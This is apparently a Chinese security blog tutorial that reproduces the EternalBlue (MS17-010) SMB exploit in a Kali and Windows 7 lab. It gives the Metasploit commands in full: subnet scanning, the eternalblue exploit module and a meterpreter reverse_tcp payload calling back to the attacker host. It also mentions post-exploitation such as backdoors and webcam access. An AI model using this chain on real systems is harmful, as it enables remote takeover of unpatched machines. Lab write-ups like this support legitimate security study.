永恒之藍
定義:
永恒之藍是指2017年4月14日晚,黑客團體Shadow Brokers(影子經紀人)公布一大批網路攻擊工具,其中包含“永恒之藍”工具,“永恒之藍”利用Windows系統的SMB漏洞可以獲取系統最高權限,5月12日,不法分子通過改造“永恒之藍”制作了wannacry勒索病毒,英國、俄羅斯、整個歐洲以及中國國內多個高校校內網、大型企業內網和政府機構專網中招,被勒索支付高額贖金才能解密恢復檔案,
原理:
惡意代碼會掃描開放445檔案共享埠的Windows機器,無需用戶任何操作,只要開機上網,不法分子就能在電腦和服務器中植入勒索軟體、遠程控制木馬、虛擬貨幣挖礦機等惡意程式,
復現開始
環境:
1.kali2021虛擬機 實驗中IP:192.168.6.130
2.window 7虛擬機 實驗中IP:192.168.6.135
工具
博主有話說:
介于一下東西,大家都懂,我就隨便寫了個精簡版的永恒之藍,大家學習就好,別瞎弄,所以這個還是得有一些基礎知識的能看懂,小白文太浪費時間了,
開始
1.斷開防火墻,windos 7 的防火墻關閉
2.實作相互ping通
環境弄好了,正文開始!
3.在kali當中啟動metasploit工具,
通過執行msfconsole指令進行啟動,
4.Search命令搜索ms17-010漏洞掃描模塊,圖中圈中的就是漏洞掃描模塊,
執行:
search ms17-010 //搜索ms17-010相關漏洞利用模塊
執行:
msf > use auxiliary/scanner/smb/smb_ms17_010 (利用模塊該掃描模塊并且設定相關掃描范圍資訊),**
執行:
use auxiliary/scanner/smb/smb_ms17_010 //選擇使用該模塊執行搜索選項
set rhosts 192.168.6.0/24 //設定掃描的網段范圍
set threads 20 //設定掃描的執行緒,數值越大掃描速度越快
run //開始運行即開始執行掃描
6.執行掃描過后,結果如下所示,從結果中可以看到在當前掃描的網段中存在一個windows 7版本的作業系統存在ms17-010漏洞,(192.168.6.135就是window 7的IP)
7.接下來進行漏洞利用程序即可,
執行:
use exploit/windows/smb/ms17_010_eternalblue //選擇漏洞利用模塊
set payload windows/x64/meterpreter/reverse_tcp //設定漏洞利用完成后的反彈模塊,用以接識訓饋資訊
set lhost 192.168.6.130//設定反彈IP地址
set lport 5555 //設定反彈埠
set rhost 192.168.6.135 //設定被攻擊的目標主機**
執行:
show options //檢查設定的資訊
9.
執行:
exploit //開始進行漏洞利用
看到WIN了嗎?你就成功了!!!
到這里即顯示漏洞利用已成功,
接下來你就可以在目標機Window 7進行一系列的操作,
什么拿shell ,值后門,調攝像頭等等,我就不演示了…
**
- 免責宣告:安全類、工具類文章僅用于安全學習、安全研究、技術交流,內容來源于互聯網已公開內容,由于傳播利用此文所提供的資訊而造成的任何直接或間接的后果和損失,均由使用者本人負責,文章作者不承擔任何責任,請遵守相關法律,禁止非法用途!
**
收藏等于白嫖,點贊才是真情[嘻嘻,滑稽]
收藏等于白嫖,點贊才是真情[嘻嘻,滑稽]
剛剛起步,給小編一個鼓勵唄,哈哈,一鍵三連
感謝!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/290003.html
標籤:其他
上一篇:CVE-2021-36934復現
下一篇:自動化網路安全防御的問題